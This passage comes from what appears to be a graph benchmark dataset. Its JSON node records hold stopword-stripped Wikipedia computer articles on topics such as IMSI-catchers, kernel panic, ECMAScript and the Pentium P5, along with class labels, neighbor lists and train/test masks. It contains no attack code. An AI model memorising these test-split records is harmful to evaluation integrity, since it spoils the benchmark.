official u3 website individuals must register company download sdk participate forums applications require installation steps order run easily utilize u3 little modification taking steps either modify host systems files registry undoing changes application terminates wizard packages distribution files creates special manifest file provided may 2009 software development kit longer available u3.com website longer available reformatting drive remove software hidden system folder virtual cd-rom drive removed reformatting presented host system physical device attached usb hub official u3 launchpad removal software available u3 website disabled virtual cd drive device leaving usb mass storage device active u3 usb hub controller point remaining software removed subsequent format performed removal software u3_tool another option includes ability remove virtual cd-rom drive well ways reconfigure user liking numerous criticisms made u3 platform criticisms",
    "neighbors": [
      2432,
      9377,
      5413,
      3114,
      6797,
      4637,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 8848,
    "label": 2,
    "text": "Havoc_Pennington:havoc pennington robert sanford havoc pennington born c. 1976 american computer engineer entrepreneur known free software movement due work hal gnome metacity gconf d-bus havoc pennington graduated university chicago 1998 graduation worked red hat desktop manager/engineer nine years ending 2008 also founded project freedesktop.org 2000 promoted idea gnome online desktop 2007 time led development 2006–2009 mugshot project 2008 june 2011 worked consumer product startup company litl hardware proprietary software services 2011 2015 worked typesafe lightbend 2017 cofounded tidelift seeks improve ecosystem around open source software providing support professional teams using open source helping maintainers build sustainable businesses around projects",
    "neighbors": [
      1026,
      11394,
      2955,
      5644,
      6413,
      4367,
      9872,
      657,
      10255,
      1939,
      3859,
      2581,
      3478,
      10642,
      6808,
      7450,
      8476,
      1822,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      6694,
      8354,
      5931,
      8364,
      8621,
      9908,
      1717,
      823,
      2109,
      11069,
      10687,
      3649,
      708,
      10822,
      3015,
      8263,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      5095,
      4459,
      9455,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "None"
  },
  {
    "node_id": 8849,
    "label": 4,
    "text": "IMSI-catcher:imsi-catcher international mobile subscriber identity-catcher imsi-catcher telephone eavesdropping device used intercepting mobile phone traffic tracking location data mobile phone users essentially fake mobile tower acting target mobile phone service provider real towers considered man-in-the-middle mitm attack 3g wireless standard offers risk mitigation due mutual authentication required handset network however sophisticated attacks may able downgrade 3g lte non-lte network services require mutual authentication imsi-catchers used united states countries law enforcement intelligence agencies use raised significant civil liberty privacy concerns strictly regulated countries german strafprozessordnung stpo code criminal procedure countries encrypted phone data traffic weak encryption thus rendering imsi-catcher unnecessary virtual base transceiver station vbts device identifying international mobile subscriber identity imsi nearby gsm mobile phone intercepting calls patented first commercialized rohde schwarz 2003 device viewed simply modified cell tower malicious operator 4 january 2012 court appeal england wales held patent invalid obviousness gsm specification requires handset authenticate network require network authenticate handset well-known security hole exploited imsi catcher imsi catcher masquerades base station logs imsi numbers mobile stations area attempt attach imsi-catcher allows forcing mobile phone connected use call encryption a5/0 mode use easily breakable encryption a5/1 a5/2 mode making call data easy intercept convert audio 3g wireless standard mitigates risk enhanced security protocol due mutual authentication required handset network removes false base station attack gsm sophisticated attacks 3g lte may able downgrade non-lte network services require mutual authentication body-worn imsi-catchers target nearby mobile phones advertised law enforcement agencies us imsi-catchers often deployed court order without search warrant lower judicial standard pen register trap-and-trace order preferred law enforcement also used search rescue operation missing persons police departments reluctant reveal use programs contracts vendors harris corporation maker stingray kingfish phone tracker devices uk first public body admit using imsi catchers scottish prison service though likely metropolitan police service using imsi catchers since 2011 every mobile phone requirement optimize reception one base station subscribed network operator accessible always choose one strongest signal imsi-catcher masquerades base station causes every mobile phone simulated network operator within defined radius log help special identity request able force transmission imsi imsi-catcher subjects phones vicinity man-in-the-middle attack appearing preferred base station terms signal strength help sim simultaneously logs gsm network mobile station since encryption mode chosen base station imsi-catcher induce mobile station use encryption hence encrypt plain text traffic mobile station pass base station indirect connection mobile station via imsi-catcher gsm network reason incoming phone calls generally patched mobile station gsm network although modern versions devices mobile patch-through solutions order provide functionality false base station attacks prevented combination key freshness integrity protection signaling data authenticating serving network provide high network coverage umts standard allows inter-operation gsm therefore umts also gsm base stations connected umts service network fallback security disadvantage allows new possibility man-in-the-middle attack assignment imsi catcher number difficulties preliminary research done trying detect frustrate imsi-catchers one project osmocom open source mobile station software special type mobile phone firmware used detect fingerprint certain network characteristics imsi-catchers warn user device operating area firmware/software-based detection strongly limited select outdated gsm mobile phones i.e motorola longer available open market main problem closed-source nature major mobile phone producers application android imsi-catcher detector aimsicd developed detect circumvent imsi-catchers stingray silent sms technology stationary network imsi-catcher detectors also developed several apps listed google play store imsi catcher detector apps include snoopsnitch cell spy catcher gsm spy finder 100,000 500,000 app downloads however apps limitations access phone underlying hardware may offer minimal protection",
    "neighbors": [
      9356,
      11244,
      3088,
      6170,
      8413,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 8850,
    "label": 3,
    "text": "IBM_ThinkPad_760:ibm thinkpad 760 ibm thinkpad 760 notebook computer introduced 1995 ibm corporation market part thinkpad 700-series succeeded 1998 thinkpad 770 series 760 -series ibm thinkpad available time production state art notebook available public ibm featured advanced mobile technology came standard latest hardware available laptops notebooks time used intel pentium processor utilized edo ram soldered onto motherboard prevent booting without usable ram ability easily exchange critical hardware components hard drive battery option hardware fit ultrabay ram model also featured unique keyboard could slide upward back side rails flip towards user provide ergonomic feel note model number signifies machine updated chassis provision fitment cd-rom drive using adapter plate internal floppy disk drive models without n't officially come updated chassis",
    "neighbors": [
      780,
      5939,
      8851,
      3323,
      10972
    ],
    "mask": "Test"
  },
  {
    "node_id": 8851,
    "label": 3,
    "text": "P5_(microarchitecture):p5 microarchitecture first pentium microprocessor introduced intel march 22 1993 dubbed p5 microarchitecture fifth generation intel first superscalar ia-32 microarchitecture direct extension 80486 architecture included dual integer pipelines faster floating-point unit wider data bus separate code data caches features reduced address calculation latency 1996 pentium mmx technology often simply referred pentium mmx introduced basic microarchitecture complemented mmx instruction set larger caches enhancements p5 pentium competitors included motorola 68060 powerpc 601 well sparc mips alpha microprocessor families also used superscalar in-order dual instruction pipeline configuration time intel larrabee multicore architecture project uses processor core derived p5 core p54c augmented multithreading 64-bit instructions 16-wide vector processing unit intel low-powered bonnell microarchitecture employed early atom processor cores also uses in-order dual pipeline similar p5 intel discontinued p5 pentium processors downgraded entry-level product since pentium ii debuted 1997 1999 favor celeron processor also replaced 80486 brand p5 microarchitecture designed santa clara team designed 386 486 design work started 1989 team decided use superscalar architecture on-chip cache floating-point branch prediction preliminary design first successfully simulated 1990 followed laying-out design time team several dozen engineers design taped transferred silicon april 1992 point beta-testing began mid-1992 p5 team 200 engineers intel first planned demonstrate p5 june 1992 trade show pc expo formally announce processor september 1992 design problems forced demo cancelled official introduction chip delayed spring 1993 john h. crawford chief architect original 386 co-managed design p5 along donald alpert managed architectural team dror avnon managed design fpu vinod k. dham general manager p5 group p5 microarchitecture brings several important advancements preceding i486 architecture pentium designed execute 100 million instructions per second mips 75 mhz model able reach 126.5 mips certain benchmarks pentium architecture typically offered twice performance 486 processor per clock cycle common benchmarks fastest 80486 parts slightly improved microarchitecture 100 mhz operation almost powerful first-generation pentiums amd am5x86 roughly equal pentium 75 regarding pure alu performance early versions 60–100 mhz p5 pentiums problem floating-point unit resulted incorrect predictable results division operations bug discovered 1994 professor thomas nicely lynchburg college virginia became known pentium fdiv bug caused embarrassment intel created exchange program replace faulty processors soon afterwards discovered bug could allow malicious program crash system without special privileges f00f bug fortunately operating systems able implement workarounds prevent crashes 60 66 mhz 0.8 µm versions p5 pentium processors also time high heat production due 5 v operation p54c used 3.3 v significantly lower power draw 51 quadratic relationship p5 pentiums used socket 4 p54c started socket 5 moving socket 7 later revisions desktop pentiums p54cs onwards used socket 7 pentium intel primary microprocessor personal computers mid-1990s original design reimplemented newer processes new features added maintain competitiveness well address specific markets portable computers result several variants p5 microarchitecture first pentium microprocessor core code-named p5 product code 80501 80500 earliest steppings q0399 two versions specified operate 60 mhz 66 mhz respectively first implementation pentium used traditional 5-volt power supply descended usual ttl logic compatibility requirements contained 3.1 million transistors measured 16.7 mm 17.6 mm area 293.92 mm fabricated 0.8 µm bicmos process 5-volt design resulted relatively high energy consumption operating frequency compared later models p5 followed p54c 80502 also known pentium-s versions specified operate 75 90 100 mhz using 3.3 volt power supply first pentium processor operate 3.3 volts reducing energy consumption employed internal clock multiplier let internal circuitry work higher frequency external address data buses complicated cumbersome increase external frequency due physical constraints also allowed two-way multiprocessing integrated local apic well new power management features contained 3.3 million transistors measured 163 mm fabricated bicmos process described 0.5 µm 0.6 µm due differing definitions p54c followed p54cqs operated 120 mhz fabricated 0.35 µm bicmos process first commercial microprocessor fabricated 0.35 µm process transistor count identical p54c despite newer process identical die area well chip connected package using wire bonding allows connections along edges chip smaller chip would required redesign package limit length wires edges chip would away pads package solution keep chip size retain existing pad-ring reduce size pentium logic circuitry enable achieve higher clock frequencies p54cqs followed p54cs operated 133 150 166 200 mhz contained 3.3 million transistors measured 90 mm fabricated 0.35 µm bicmos process four levels interconnect p24t pentium overdrive 486 systems released 1995 based 3.3 v 0.6 µm versions using 63 83 mhz clock since used socket 2/3 modifications made compensate 32-bit data bus slower on-board l2 cache 486 motherboards therefore equipped 32 kb l1 cache double pre-p55c pentium cpus p55c 80503 developed intel research development center haifa israel sold pentium mmx technology usually called pentium mmx although based p5 core featured new set 57 mmx instructions intended improve performance multimedia tasks encoding decoding digital media data pentium mmx line introduced october 22 1996 new instructions worked new data types 64-bit packed vectors either eight 8-bit integers four 16-bit integers two 32-bit integers one 64-bit integer example paddusb packed add unsigned saturated byte instruction adds two vectors containing eight 8-bit unsigned integers together elementwise addition would overflow saturates yielding 255 maximal unsigned value represented byte rather specialized instructions generally require special coding programmer used changes core include 6-stage pipeline vs. 5 p5 return stack first done cyrix 6x86 better parallelism improved instruction decoder 32 kb l1 cache 4-way associativity vs. 16 kb 2-way p5 4 write buffers could used either pipeline vs. one corresponding pipeline p5 improved branch predictor taken pentium pro 512-entry buffer vs. 256 p5 contained 4.5 million transistors area 140 mm fabricated 0.28 µm cmos process metal pitches previous 0.35 µm bicmos process intel described 0.35 µm similar transistor density process four levels interconnect p55c compatible common socket 7 motherboard configuration voltage requirements powering chip differ standard socket 7 specifications motherboards manufactured socket 7 prior establishment p55c standard compliant dual intensity required proper operation chip intel temporarily manufactured upgrade kit called overdrive designed correct lack planning motherboard makers part pentium mmx notebook cpus used mobile module held cpu module pcb cpu directly attached smaller form factor module snapped notebook motherboard typically heat spreader installed made contact module however 0.25 µm tillamook mobile pentium mmx named city oregon module also held 430tx chipset along system 512 kb sram cache memory introduction pentium competitors nexgen amd cyrix texas instruments announced pentium-compatible processors 1994 cio magazine identified nexgen nx586 first pentium-compatible cpu pc magazine described cyrix 6x86 first followed amd k5 delayed due design difficulties amd later bought nexgen order help design amd k6 cyrix purchased national semiconductor later processors amd intel retain compatibility original pentium manuals provide overview pentium processor features",
    "neighbors": [
      7173,
      6151,
      4108,
      9741,
      5649,
      548,
      8231,
      7234,
      3142,
      6730,
      2638,
      1119,
      4204,
      8301,
      2161,
      5234,
      5235,
      8820,
      630,
      4217,
      3194,
      8834,
      2692,
      8325,
      7302,
      1677,
      8850,
      6804,
      4252,
      6815,
      1186,
      9391,
      4276,
      11447,
      2237,
      5309,
      6339,
      4805,
      10440,
      4306,
      3798,
      731,
      10972,
      6879,
      5856,
      5356,
      5358,
      5871,
      1776,
      3317,
      5883,
      5380,
      5386,
      4886,
      3352,
      799,
      10548,
      2874,
      5444,
      8523,
      1376,
      8033,
      9570,
      3945,
      11627,
      1399,
      9592,
      5503,
      3459,
      3973,
      9095,
      9611,
      398,
      5523,
      9111,
      9126,
      5035,
      10669,
      1461,
      4537,
      8125,
      1998,
      5073,
      473,
      7134,
      1000,
      7657,
      8684,
      10734,
      499,
      8700,
      3070
    ],
    "mask": "Test"
  },
  {
    "node_id": 8852,
    "label": 3,
    "text": "Kernel_panic:kernel panic kernel panic sometimes abbreviated kp safety measure taken operating system kernel upon detecting internal fatal error either unable safely recover system continue run without much higher risk major data loss term largely specific unix unix-like systems microsoft windows operating systems equivalent term stop error resulting bug check screen presents bug check code blue background early versions windows colloquially known blue screen death bsod green background xbox one platform well windows 10 builds kernel routines handle panics known codice_1 t-derived bsd unix source code generally designed output error message console dump image kernel memory disk post-mortem debugging either wait system manually rebooted initiate automatic reboot information provided highly technical nature aims assist system administrator software developer diagnosing problem kernel panics also caused errors originating outside kernel space example many unix operating systems panic init process runs userspace terminates unix kernel maintains internal consistency runtime correctness assertions fault detection mechanism basic assumption hardware software perform correctly failure assertion results panic i.e voluntary halt system activity kernel panic introduced early version unix demonstrated major difference design philosophies unix predecessor multics multics developer tom van vleck recalls discussion change unix developer dennis ritchie remarked dennis easily half code writing multics error recovery code said left stuff error routine called panic called machine crashes holler hall 'hey reboot original codice_1 function essentially unchanged fifth edition unix vax-based unix 32v output error message information dropped system endless idle loop source code codice_1 function v6 unix unix codebase enhanced codice_1 function also enhanced dump various forms debugging information console panic may occur result hardware failure software bug operating system many cases operating system capable continued operation error occurred however system unstable state rather risking security breaches data corruption operating system stops prevent damage facilitate diagnosis error usual cases restart recompiling kernel binary image source code kernel panic booting resulting kernel common problem kernel correctly configured compiled installed add-on hardware malfunctioning ram could also sources fatal kernel errors start due incompatibility os missing device driver kernel may also go codice_1 unable locate root file system final stages kernel userspace initialization panic typically triggered spawning init fails panic might also triggered init process terminates system would unusable following implementation linux kernel final initialization codice_6 ref name= lxr init/main.c linux/init/main.c lxr cross referencer /ref kernel panics appear linux like unix-like systems also generate another kind error condition known kernel oops case kernel normally continues run killing offending process oops could cause subsystems resources become unavailable later lead full kernel panic linux kernel kernel panic causes keyboard leds blink visual indication critical condition kernel panic occurs mac os x 10.2 10.7 computer displays multilingual message informing user need reboot system prior 10.2 traditional unix-style panic message displayed 10.8 later computer automatically reboots displays message restart format message varies version version sometimes five kernel panics within three minutes first one mac display prohibitory sign 30 seconds shut known recurring kernel panic versions 10.2 text superimposed standby symbol full screen debugging information saved nvram written log file reboot 10.7 feature automatically restart kernel panic cases 10.2 later white text detailing error may appear addition standby symbol",
    "neighbors": [
      4615,
      2571,
      5647,
      1042,
      6700,
      4657,
      1074,
      5176,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      10333,
      2149,
      10856,
      8303,
      5744,
      6771,
      2676,
      6772,
      7795,
      9343,
      3719,
      10888,
      11402,
      6797,
      2193,
      1686,
      2199,
      7318,
      3228,
      1694,
      2207,
      1699,
      5292,
      8877,
      1710,
      6319,
      11444,
      3766,
      2232,
      9406,
      9919,
      1729,
      6849,
      713,
      9418,
      3790,
      3289,
      4318,
      231,
      9451,
      2288,
      5363,
      7928,
      8441,
      2811,
      7422,
      11521,
      2819,
      1796,
      10512,
      5397,
      11037,
      10016,
      811,
      3371,
      7983,
      10036,
      823,
      9016,
      9529,
      4933,
      4423,
      9035,
      11604,
      1878,
      2409,
      4457,
      5492,
      5000,
      9100,
      5520,
      3474,
      9109,
      1439,
      3488,
      6078,
      9151,
      457,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "None"
  },
  {
    "node_id": 8853,
    "label": 3,
    "text": "MOVAPD:movapd x86 assembly programming language movapd name specific action performable modern x86 processors 2nd-generation streaming simd extensions sse2 action involves copying pair numbers temporary space processor use computations movapd one fastest ways accomplish effect specifically movapd causes 16-byte-aligned packed-doubles source copied xmm register 16-byte memory region source operand either xmm register xmm2 memory address m128 destination operand either xmm register xmm1 memory address m128 note however source destination operands memory addresses memory address operand 16-byte-aligned general protection exception gp raised cause strange interoperability bugs ordinary code calls external code compiled assumption 16-byte-aligned stack frame boundary x86 instruction listings",
    "neighbors": [
      10689,
      6596,
      8262,
      6025,
      499,
      5844,
      1915,
      8126
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8854,
    "label": 9,
    "text": "ECMAScript:ecmascript ecmascript es scripting-language specification standardized ecma international ecma-262 iso/iec 16262 created standardize javascript foster multiple independent implementations javascript remained best-known implementation ecmascript since standard first published well-known implementations including jscript actionscript ecmascript commonly used client-side scripting world wide web increasingly used writing server applications services using node.js ecmascript specification standardized specification scripting language developed brendan eich netscape initially named mocha later livescript finally javascript december 1995 sun microsystems netscape announced javascript press release first edition ecma-262 adopted ecma general assembly june 1997 several editions language standard published since name ecmascript compromise organizations involved standardizing language especially netscape microsoft whose disputes dominated early standards sessions eich commented ecmascript always unwanted trade name sounds like skin disease javascript jscript aim compatible ecmascript also provide additional features described ecma specifications ten editions ecma-262 published work version 10 standard finalized june 2019 june 2004 ecma international published ecma-357 standard defining extension ecmascript known ecmascript xml e4x ecma also defined compact profile ecmascript – known es-cp ecma 327 – designed resource-constrained devices withdrawn 2015 proposed fourth edition ecma-262 ecmascript 4 es4 would first major update ecmascript since third edition published 1999 specification along reference implementation originally targeted completion october 2008 overview language released working group october 23 2007 august 2008 ecmascript 4th edition proposal scaled back project codenamed ecmascript harmony features discussion harmony time included intent features partly better support programming large allow sacrificing script ability dynamic improve performance example tamarin – virtual machine actionscript developed open sourced adobe – just-in-time compilation jit support certain classes scripts addition introducing new features es3 bugs proposed fixed edition 4 fixes others support json encoding/decoding folded ecmascript 5th edition specification work started edition 4 es-cp compact profile specification completed continued approximately 18 months slow progress made balancing theory netscape javascript 2 specification implementation experience microsoft jscript .net time focus shifted ecmascript xml e4x standard update without controversy late 2007 debate eich later mozilla foundation cto chris wilson microsoft platform architect internet explorer became public number blogs wilson cautioned proposed changes ecmascript made backwards incompatible respects earlier versions language update amounted breaking web stakeholders opposed changes hidden view eich responded stating wilson seemed repeating falsehoods blogs denied attempt suppress dissent challenged critics give specific examples incompatibility pointed microsoft silverlight adobe air rely c actionscript 3 respectively larger complex ecmascript edition 3 yahoo microsoft google 4th edition dissenters formed subcommittee design less ambitious update ecmascript 3 tentatively named ecmascript 3.1 edition would focus security library updates large emphasis compatibility aforementioned public sparring ecmascript 3.1 ecmascript 4 teams agreed compromise two editions would worked parallel coordination teams ensure ecmascript 3.1 remains strict subset ecmascript 4 semantics syntax however differing philosophies team resulted repeated breakages subset rule remained doubtful ecmascript 4 dissenters would ever support implement ecmascript 4 future year since disagreement future ecmascript within ecma technical committee 39 two teams reached new compromise july 2008 brendan eich announced ecma tc39 would focus work ecmascript 3.1 later renamed ecmascript 5th edition project full collaboration parties vendors would target least two interoperable implementations early 2009 april 2009 ecma tc39 published final draft 5th edition announced testing interoperable implementations expected completed mid-july december 3 2009 ecma-262 5th edition published 6th edition initially known ecmascript 6 es6 later renamed ecmascript 2015 finalized june 2015 update adds significant new syntax writing complex applications including class declarations class foo ... es6 modules like import modulename ... export const foo defines semantically terms ecmascript 5 strict mode new features include iterators for/of loops python-style generators arrow function expression ... codice_1 keyword local declarations codice_2 keyword constant variable declarations binary data typed arrays new collections maps sets weakmap promises number math enhancements reflection proxies metaprogramming virtual objects wrappers template literals strings complete list extensive first ecmascript harmony specification also known es6 harmony 7th edition officially known ecmascript 2016 finalized june 2016 major standard language features include block-scoping variables functions destructuring patterns variables proper tail calls exponentiation operator codice_3 numbers codice_4 codice_5 keywords asynchronous programming 8th edition officially known ecmascript 2017 finalized june 2017 includescodice_6constructions work using generators promises ecmascript 2017 es2017 eighth edition includes features concurrency atomics syntactic integration promises async/await 9th edition officially known ecmascript 2018 finalized june 2018 new features include rest/spread operators variables three dots codice_7 asynchronous iteration codice_8 additions regexp 10th edition officially known ecmascript 2019 published june 2019.. es.next dynamic name refers whatever next version time writing es.next features correctly called proposals definition specification finalized yet ecmascript language includes structured dynamic functional prototype-based features es6 brought new mode defining functions called arrow functions es5 function would defined var readwikiarticle function content whereas es6 using new concise arrow function syntax var readwikiarticle content arrow functions also improve variable binding functions since es 2015 transpiling javascript become common transpilation source source compilation newer versions javascript used user source code transpiler rewrites compliant current specification usually transpilers transpile es3 maintain compatibility versions browsers settings transpiling specific version configured according need transpiling adds extra step build process sometimes done avoid needing polyfills polyfills allow using functionalities newer ecma versions older environments lack polyfills runtime interpreter user browser server instead transpiling rewrites ecma code build phase development reaches interpreter 2010 ecma international started developing standards test ecma 262 ecmascript test262 ecmascript conformance test suite used check closely javascript implementation follows ecmascript 5th edition specification test suite contains thousands individual tests tests specific requirements ecmascript specification development test262 project ecma technical committee 39 tc39 testing framework individual tests created member organizations tc39 contributed ecma use test262 important contributions made google sputnik testsuite microsoft contributed thousands tests test262 testsuite already contains 11,000 tests developed ecmascript specifications es7 well-supported major web browsers table shows conformance rate current versions software respect recent editions ecmascript content test hosted official repository https //github.com/tc39/test262 date test suite harness web browsers accessed also https //v8.github.io/test262/website/default.html https //bakkot.github.io/test262-web-runner/ official repository also points community maintained projects using test suite test ecmascript javascript environments like node.js",
    "neighbors": [
      10752,
      515,
      3076,
      9735,
      9224,
      6154,
      5149,
      9245,
      31,
      5677,
      2045,
      9780,
      3126,
      1079,
      1591,
      10808,
      9275,
      62,
      10819,
      1610,
      4171,
      5708,
      1613,
      9290,
      84,
      603,
      8289,
      5219,
      9330,
      9843,
      119,
      4728,
      1664,
      9345,
      4231,
      6791,
      8858,
      155,
      3229,
      2206,
      4768,
      10413,
      3761,
      1203,
      5816,
      5311,
      7871,
      8904,
      4822,
      7396,
      8421,
      4326,
      8426,
      10991,
      3313,
      764,
      2304,
      259,
      10507,
      10510,
      4378,
      11036,
      5917,
      8990,
      7455,
      803,
      5413,
      11559,
      11056,
      11060,
      2880,
      6977,
      8524,
      11087,
      337,
      338,
      339,
      3921,
      10581,
      2904,
      7513,
      9560,
      9561,
      10584,
      10586,
      10083,
      11625,
      8554,
      5483,
      10097,
      3447,
      1409,
      3462,
      4486,
      8582,
      8584,
      5521,
      6034,
      4507,
      8605,
      8609,
      5031,
      6062,
      8627,
      438,
      5048,
      9152,
      9665,
      963,
      11219,
      5078,
      2519,
      4056,
      4058,
      5597,
      479,
      4064,
      9185,
      482,
      487,
      9195,
      494,
      2030,
      5614,
      1010,
      2556,
      2557,
      10238,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 8855,
    "label": 3,
    "text": "LGA_2011:lga 2011 lga 2011 also called socket r cpu socket intel released november 14 2011 replaces intel lga 1366 socket b lga 1567 performance high-end desktop server platforms socket 2011 protruding pins touch contact points underside processor lga 2011 socket uses qpi connect cpu additional cpus dmi 2.0 used connect processor pch memory controller 40 pci express pcie lanes integrated cpu secondary processor extra ×4 pcie interface replaces dmi interface predecessor lga 1366 provisioning integrated graphics socket supports four ddr3 ddr4 sdram memory channels three unbuffered registered dimms per channel well 40 pci express 2.0 3.0 lanes lga 2011 also ensure platform scalability beyond eight cores 20 mb cache lga 2011 socket used sandy bridge-e/ep ivy bridge-e/ep processors corresponding x79 e enthusiast class c600-series ep xeon class chipsets lga 2011-1 socket r2 updated generation socket successor lga 1567 used ivy bridge-ex xeon e7 v2 haswell-ex xeon e7 v3 cpus released february 2014 may 2015 respectively lga 2011-v3 socket r3 also referred lga 2011-3 another updated generation socket used haswell-e haswell-ep cpus released august september 2014 respectively updated socket generations physically similar lga 2011 different electrical signals ilm keying prevent backward compatibility older cpus intel cpu sockets use so-called independent loading mechanism ilm retention device apply specific amount uniform pressure required correctly hold cpu socket interface part design ilms differently placed protrusions intended mate cutouts cpu packagings protrusions also known ilm keying purpose preventing installation incompatible cpus otherwise physically compatible sockets preventing ilms mounted 180-degree rotation relative cpu socket different variants generations lga 2011 socket associated cpus come different ilm keying makes possible install cpus generation-matching sockets cpus intended mounted lga 2011-0 r lga 2011-1 r2 lga 2011-v3 r3 sockets mechanically compatible regarding dimensions ball pattern pitches designations contacts different generations lga 2011 socket cpus makes electrically logically incompatible original lga 2011 socket used sandy bridge-e/ep ivy bridge-e/ep processors lga 2011-1 used ivy bridge-ex xeon e7 v2 haswell-ex xeon e7 v3 cpus released february 2014 may 2015 respectively lga 2011-v3 socket used haswell-e haswell-ep cpus released august september 2014 respectively two types ilm exist different shapes heatsink mounting hole patterns m4 x 0.7 threads square ilm 80×80 mm mounting pattern narrow ilm 56×94 mm mounting pattern square ilm standard type narrow one alternatively available space-constrained applications matching heatsink required ilm type information intel x79 desktop c600 series workstations servers codenamed romley chipsets table romley ep platform delayed approximately one quarter allegedly due sas controller bug x79 appears contain silicon c600 series ecs enabled sas controller one boards even though sas officially supported intel x79 desktop processors lga 2011 2011-3 socket listed table x79 chipset allows increasing base clock bclk intel calls cpu strap 1.00× 1.25× 1.66× 2.50× cpu frequency derived bclk times cpu multiplier server processors lga 2011 socket listed table server processors lga 2011 socket server processors lga 2011-v3 socket listed tables one significant changes previous generation support ddr4 memory",
    "neighbors": [
      3588,
      5901,
      7313,
      5523,
      4886,
      2455,
      3992,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      2237,
      8125,
      8126,
      833,
      7105,
      4805,
      7110,
      9541,
      8394,
      3403,
      4427,
      977,
      5073,
      4179,
      2516,
      5844,
      3798,
      4185,
      7002,
      9945,
      10715,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10734,
      10225,
      371,
      9592,
      4217,
      8442,
      4603
    ],
    "mask": "Test"
  },
  {
    "node_id": 8856,
    "label": 2,
    "text": "Real_Time_AudioSuite:real time audiosuite real-time audiosuite rtas format audio plug-in developed digidesign currently avid technology pro tools le pro tools m-powered systems although run pro tools hd pro tools tdm systems rtas plug-ins use processing power host computer rather dsp cards used pro tools hd systems name suggests plug-in architecture designed run real-time mimicking hardware inserts traditional mixing console contrast rendering files time effects applied directly audio pro tools facilitated audiosuite plug-ins avid aax format runs native cpu pro tools hdx dsp replacement rtas april 7 2013 avid announced pro tools 11 version forward avid made aax plug-in format supported pro tools launch many third-party plug-in developers yet port software new aax format avid sell pro tools 11 11 10 license allowing users run pro tools 10.3.8 last version support rtas plug-ins employ form copy protection notably pace ilok dongle though plug-ins available free charge accompanying source code programming documentation available general public developers must contact avid sdk terms disclosure releasing information avid development materials making official rtas development incompatible open source software fxpansion stated rtas vst converter happen technical legal reasons",
    "neighbors": [
      6797,
      7983,
      596,
      823,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 8857,
    "label": 2,
    "text": "SystemRescueCD:systemrescuecd systemrescuecd linux distribution x86 64 previously x86 computers primary purpose systemrescuecd repair un-bootable otherwise damaged computer systems system crash systemrescuecd intended used permanent operating system runs live cd usb flash drive type hard drive designed team led françois dupoux based arch linux starting version 6.0 provides x86-64 images based arch linux systemd init system increased size iso image longer fits one standard 700 mib cd requires either one dvd non-standard high-capacity cd 100-min writable cd using technique called overburning bootable media like usb flash drive systemrescuecd capable graphics using linux framebuffer option tools gparted uses version 4.19.20 linux kernel options connecting internet adsl modem ethernet graphical web browsers mozilla firefox systemrescuecd many features including cd also boot customized dvd almost 4.6 gb free space backed-up files makes good storing information needed hard drive formatting burn dvd one must burn image file first add separate files folders affect general way dvd works dvd used insert files hard drive using midnight commander",
    "neighbors": [
      8837,
      3975,
      7435,
      6797,
      10127,
      2193,
      2321,
      3859,
      5397,
      4887,
      10394,
      6939,
      673,
      3745,
      10530,
      292,
      9253,
      10149,
      11305,
      7854,
      7087,
      7983,
      2738,
      8114,
      4790,
      823,
      2744,
      439,
      56,
      59,
      7483,
      8254,
      3903,
      4673,
      2375,
      4039,
      8907,
      11388,
      1110,
      5078,
      3420,
      9693,
      1121,
      2914,
      6371,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      1007,
      2671,
      2545,
      3314,
      499,
      5363,
      7920,
      8177,
      9074,
      9461,
      6393,
      9843,
      8700,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 8858,
    "label": 9,
    "text": "Google_Apps_Script:google apps script apps script scripting framework light-weight application development g suite platform based javascript 1.6 also includes portions 1.7 1.8 subset ecmascript 5 api apps script projects run server-side google infrastructure according google apps script provides easy ways automate tasks across google products third party services apps script also tool powers add-ons google docs sheets slides following code uses apps script ui services doclist services display contents google drive folder tree format notice use javascript use google web toolkit widgets google also introduced html service june 2012 alternative gwt widgets lets serve web pages interact server-side apps script functions embedding html gas gwt widget march 2014 google introduced add-ons docs sheets soon followed forms add-on stores let users add extra features google editors mail-merging workflows diagrams builders ... add-ons either 100 built apps script simply use apps script display ui google editors relying external backend perform tasks example mailchimp mail-merging tool add-on google docs communicates mailchimp platform send emails add-ons possible publish scripts google sheets script gallery users installed scripts gallery copy apps script code installed user sheet add-ons source code visible end user everyone using latest version published developer new approach make easier support existing code helped convince several companies mailchimp lucidchart invest apps script part add-ons release google also introduced ui style guide css package help developers built add-ons integrate smoothly editors add-on also reviewed google publication developers benefit advice googlers provide better user experience possible embed ads add-ons possible monetize",
    "neighbors": [
      4096,
      1409,
      4995,
      5892,
      3462,
      8455,
      7816,
      9610,
      10506,
      5262,
      8719,
      3600,
      6800,
      5522,
      1427,
      5524,
      7700,
      8854,
      10645,
      11408,
      10009,
      10393,
      1435,
      9244,
      10525,
      798,
      288,
      7841,
      2978,
      803,
      4901,
      1959,
      3499,
      7595,
      10284,
      3633,
      1203,
      5431,
      2875,
      10045,
      7359,
      2880,
      196,
      3269,
      3782,
      11590,
      11592,
      4683,
      4044,
      10445,
      9039,
      3664,
      3409,
      4048,
      3795,
      11343,
      1240,
      7548,
      8285,
      8413,
      6367,
      9949,
      2658,
      6632,
      5483,
      236,
      5100,
      9712,
      9970,
      8821,
      7926,
      3836
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8859,
    "label": 4,
